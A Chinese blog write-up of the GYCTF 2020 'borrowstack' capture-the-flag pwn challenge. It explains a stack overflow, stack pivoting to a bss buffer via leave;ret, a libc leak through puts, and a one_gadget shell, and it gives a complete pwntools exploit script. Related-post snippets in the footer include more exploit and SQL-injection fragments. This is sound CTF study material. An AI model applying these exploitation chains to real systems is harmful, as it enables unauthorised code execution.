GYCTF 2020-borrowstack

最新推荐文章于 2024-07-31 11:47:44 发布
最新推荐文章于 2024-07-31 11:47:44 发布
阅读量1k 收藏 1
点赞数 1
分类专栏: pwn题目
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Eagle_hwei/article/details/104816491
版权

borrowstack的题目分析

2020-03-12 10:46:10 by hawkJW

题目附件、ida文件及wp链接

   这道题的漏洞很明显,思路也比较明显,但就是有坑!!!学习一下

1. 程序流程总览

首先,按照惯例,我们看一下程序开启的保护措施,如图所示

除了栈上不可以执行以外,其余的保护措施基本没有开启,因此该程序的保护措施还是比较松的。

下面我们来粗略的浏览一下程序的源代码来分析程序流程

这个流程相当之简单——也就是先输入到栈上,再输入到一个固定地址处。总体流程就这么简单。很明显,栈上有溢出漏洞,我们的突破口就在这里

 2. 漏洞分析

  实际上,正如上面所提到过的,很明显,这里的一个漏洞就是栈上的输入漏洞——其可以修改rbp的值,并且修改返回地址的值。但问题也在于其可溢出的地址实在是太小了,如果再大一些的话就方便多了。

  实际上,我们发现后面还有一次输入,而且其输入的地址是一个可知的固定地址,那么自然的,我们会想到,能不能把栈转移到那个对应的固定地址上,这样子实际上就相当于扩大了可溢出地址的范围,问题也就迎刃而解了。

  那么我们如何将栈转移到该固定地址(也就是让rsp指向该固定地址),实际上,这里需要了解一下leave的作用

也就是 retn 上面那一条指令。

这里我大概说一下这条指令的作用

mov rsp, rbp
pop rbp

我们看到,也就是将rsp的值修改成了rbp的值,而之前我们提到过的,我们溢出的时候可以修改rbp的值,那么这样我们实际上也就可以修改rsp的值,从而指定rsp的值的指向

 3. 漏洞利用

   正如上面所分析的,实际上,我们我们利用一次 leave; retn ,即可巧妙的修改栈空间的位置。

  首先,我们输入如下字符串达到栈溢出的目的

  

 r.send('a' * 0x60 + p64(stack_address - 0x8) + p64(0x0000000000400699))

  也就是我们将rbp的值修改为 stack_address - 0x8 ,返回地址设置为 0x0000000000400699 ,我们看看0x400699位置处的代码是什么,如图所示

  

  我们令stack_address的所指向的地址仍然为

leave   
retn

  那么根据我们刚才分析的,leave将会首先将rbp中的值赋给rsp,也就是rsp的值变为 stack_address - 0x8 ;

  然后在pop rbp;这里不需要再看rbp如何变化了,主要的影响在于将rsp的值加上0x8,也就是rsp的值成为了stack_address,完成了栈的转移。

 

  那么如果我们讲stack_address的值设置为bank地址——也就是第二次输入的那个固定地址的话,并且在第二次输入提前准备好的shellcode的话,那么按照前面所说的,栈地址将转移到bank地址处,从而实现正常的栈溢出利用。

  后面的思路也就很简单了——输出lib的基址,然后利用one_gadget获取shell。这道很简单,这是虽然这样分析,但却有一个大坑。。。

  就是我们需要输出lib,也就是会在栈上调用puts函数,但是由于那个固定地址(bank)和got表的位置相当的近(如图所示),我们调用时很可能会直接覆盖掉got表项,从而在我们的shellcode中无法再利用got表调用函数,因此,解决的方法

  是相对的抬高一下栈地址——因为我们可以制定任意的stack_address,我们可以讲stack_address设置为bank地址加上一个偏移,偏移用来防止got表被覆盖掉。

 

  最后放出最后的wp

#coding:utf-8

from pwn import *

context.log_level = 'debug'
debug = 1

def exp(debug):
    elf = ELF('./borrowstack')
    lib = ELF('/lib/x86_64-linux-gnu/libc-2.23.so')
    if debug == 1:
        r = process('./borrowstack')
        #gdb.attach(r, 'b *0x00000040069A')
        #r = gdb.debug('./borrowstack', 'b *0x000000000040068F')
    else:
        r = remote('node3.buuoj.cn', 26597)
        
    
    r.recvuntil('\n')

    one_gadget = 0x4526a
    r.send('a' * 0x60 + p64(0x0000000000601080 + 0x8 * 9 - 0x8) + p64(0x0000000000400699))

    r.send(p64(0) * 9 + p64(0x0000000000400703) + p64(elf.got['puts']) + p64(elf.plt['puts']) + p64(0x0000004006FA) + p64(0) + p64(1) + p64(0x000000000601028) + p64(0x200) + p64(0x601080 + 0xa0 - 0x8) + p64(0) + p64(0x000004006E0))
    r.recvuntil('\n')
    libc = u64(r.recvuntil('\n')[:-1].ljust(8, '\x00')) - lib.sym['puts']
    log.info('lib \'s address => %#x'%libc)
    r.send(p64(libc + one_gadget) + p64(0) * 10)
    r.interactive()

exp(debug)

总结

  这道题漏洞明显,思路清晰——但就是需要注意一下坑——不要因为修改了栈空间,从而导致got表被覆盖掉!!将栈空间稍微抬高一些!!

HawkJW
关注
专栏目录
BUUCTF gyctf_2020_borrowstack
BengDouLove的博客
04-22 832
第一个read的只能溢出0x10字节,也就是刚好覆盖返回地址,如果要ROP地方肯定不够 所以栈迁移到bank,在那里ROP 之前没遇到过这样的题,怎么迁过去我苦思冥想,最终还是看了wp,,用两个leave来控制rsp和rbp寄存器,太妙了 leave是个伪代码,,分解开就是 mov rsp,rbp pop rbp 如果把栈构造成这样 ‘A’ * 0x60 bank_addr leave_...
GYCTF 2020-BFnote题目分析
Eagle_hwei的博客
03-14 881
BFnote的题目分析 2020-03-1408:28:02 by hawkJW 题目附件、ida文件及wp链接   自己太菜了,这道题里面包含的一些知识点和思路确实是以前完全没有接触过的。。。特别学习一下 1. 程序流程总览 首先,按照惯例,我们看一下程序开启的保护措施,如图所示 可以看到,仅仅是没有开启PIE保护,其余基本上保护都开启了,保护还是比较严格的。 下面我们来粗...
gyctf_2020_borrowstack
m0_57754423的博客
02-13 405
这道题就是常规的栈迁移,但是有坑,bank距离got表的位置比较近,这样在puts函数开辟栈帧的时候,很可能会覆盖到got表,导致无法正常执行。 我们可以使用足够多的ret指令来抬高rsp的位置,防止开辟栈帧时,覆盖到got表。 exp: from pwn import * p = process("./gy") # p =remote("node4.buuoj.cn",27630) context.log_level = "debug" e = ELF('/home/amazh/Desktop/b
[GYCTF2020]FlaskApp (pin码,jinja2绕过注入)
最新发布
weixin_73399382的博客
07-31 1227
对于非docker机每一个机器都会有自已唯一的id,linux的id一般存放在/etc/machine-id或/proc/sys/kernel/random/boot_i,有的系统没有这两个文件,windows的id获取跟linux也不同。PIN 机制在 [Flask debug 模式 PIN 码生成机制安全性研究笔记](https://www.cnblogs.com/HacTF/p/8160076.html) 一文中有详细的研究。我是在/etc/machine-id下找到的,也就是第三个payload。
[BUUCTF]PWN——gyctf_2020_borrowstack
mcmuyanga的博客
11-17 1539
gyctf_2020_borrowstack 附件 步骤: 例行检查,64位程序,开启NX保护 本地运行一下程序,看看大概的情况 64位ida载入,直接从main函数开始看程序, buf可以溢出0x10字节,只能够覆盖到ret,参数bank在bss段上,所以打算在buf处利用leave指令去劫持栈,让它跳转去bank处,往bank里写入我们的ret2libc的攻击链去获取shell 随便找个leave指令的地址,leave=0x400699 bank在bss段上的地址 设置rdi寄存器的指令地
【pwn】 gyctf_2020_borrowstack
Nothing
03-02 1653
例行检查 程序逻辑 看到buf缓冲区有0x10大小溢出,且可以控制bss段上的bank,可以用栈迁移做,这题的bss段离got表较近,在迁移时尽量往高地址迁移,防止在rop时破坏got表上数据。 from pwn import * io=remote('node3.buuoj.cn','29302') bank=0x0601080 leave=0x400699 puts_plt=0x0400...
BUUCTF之[GYCTF2020]Blacklist--------堆叠查询
weixin_44632787的博客
06-19 711
BUUCTF之[GYCTF2020]Blacklist--------堆叠查询 启动挑战项目,发现前端界面显示Black list is so weak for you,isn’t it 又是一道用堆叠查询的题目,看来CTF也很喜欢考这类型的题目呀! 首先爆出数据库:1’;show databases; 然后爆出表名:1’; show tables; 然后显示某个表里面列的信息:1’;show columns from FlagHere; 接下来的才是重点,在MYSQL数据库中: 可以用handl
[GYCTF2020] web题-Ezsqli
BROTHERYY的博客
12-30 446
这题一直出问题,用脚本跑到一半都会崩。 后面换了一个,能够跑出来。 详细情况可以看看Ying师傅的blog https://www.gem-love.com/ctf/1782.html 我把跑出来的代码贴出来可以参考下 # coding:utf-8 import requests import time url = 'http://2aa83373-6644-4c2f-904a-9f15560d4f1c.node3.buuoj.cn/' def str_hex(s): #十六进制转换 fl ==>
GYCTF2020borrowstack------<栈迁移原理、ret2csu万能gadget、one-gadget工具>
qq_21746331的博客
01-22 1675
GYCTF2020borrowstack知识点关键字样本知识点详解0x1 ret2csu原理0x2 栈迁移原理0x3 one-gadget 工具样本分析0x1 静态分析0x2 payload 构造0x3 动态调试0x4 exp参考文献 知识点关键字 栈迁移、ROP、csu万能gadget、one-gadget 样本 样本来自于GYTF2020_borrowstack,BUUCTF上有练习环境 知识点详解 0x1 ret2csu原理 动机: 在 64 位程序中,函数的前 6 个参数是通过寄存器传递
[BUUCTF-pwn]——gyctf_2020_borrowstack
Y_peak的博客
03-18 318
[BUUCTF-pwn]——gyctf_2020_borrowstack exploit from pwn import * from LibcSearcher import * p = remote('node3.buuoj.cn',28602) #p = process('./gyctf_2020_borrowstack') elf = ELF('./gyctf_2020_borrowstack') #libc = ELF('/lib/x86_64-linux-gnu/libc-2.23.so') #g
关于“gyctf_2020_borrowstack”,涉及栈迁移(pivoting),通用gadge,one_gadget
Probeginner的博客
12-05 303
我们首先给出wp: from pwn import* context.log_level='debug' p=remote('node4.buuoj.cn',26985) elf=ELF('./barop') p_rdi=0x400993 puts_plt=elf.plt['puts'] puts_got=elf.got['puts'] read_got=elf.got['read'] lbic=ELF('./libc-2.23.so') p.recvuntil("u!") ```python p.sen
BUUCTF--gyctf_2020_borrowstack1
qq_30528603的博客
01-05 382
迁到什么地方呢,肯定就是这个bank所在的地方了。我们还需要考虑一些细节上的东西,首先我们需要知道libc的基地址,因此我们需要通过puts函数来泄露。后续的操作就很简单,通过泄露的puts函数地址,计算出libc的基地址,当程序再次回到主函数时,直接将栈上的返回地址覆盖成one_gadget拿到权限。接下来的操作基本都是pop,因此rsp是从低地址到高地址跑(每次pop,rsp+8),所以我们顺序布局就可以。old_rbp覆盖成我们的bss段,让rbp指过去,接着返回地址需要再调用一次leave。
gyctf_2020_borrowstack 1
weixin_74861133的博客
03-27 348
在read buf处存在栈溢出漏洞,但只能溢出8字节,而后面有向bss段bank处读入数据,我们就可以通过栈迁移,借用bank处的bss段构建栈,但因为该bss段距离.got.plt段非常近,所以要通过在bank处构建的payload时先填充20个ret指令的地址从而实现抬高栈,这样就不会覆盖到got表处了,抬高20个可能是因为后面又要回到main函数,而main函数中要执行sub esp 60h这样如果没有抬栈就会由于主函数中的操作将got段覆盖掉。该题还有一个就是用了一个工具one_gadget。
栈帧劫持的一些利用方法及注意事项--buuctf--gyctf_2020_borrowstack
PLpa的博客
07-01 589
前言 最近在刷buuctf时发现了很多栈帧劫持的题目,从中取出最有代表性的、坑最多的拿出来写一篇博客记录一下。 保护机制 64位Linux程序,只开了NX保护。 解题思路 IDA看伪代码 伪代码分析 从代码中我们可以看到,read读入buf的字节大小只多了0x10,这样是不能构成ROP链的,但是我们发现,程序下面给了我们一个bank的bss段的地址,这不就是典型的劫持栈帧到bss段吗? 但是这里有一个坑: 我们可以看到got.plt距离bss段非常近,而bank又正好是在0x601080的位置,当我们
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值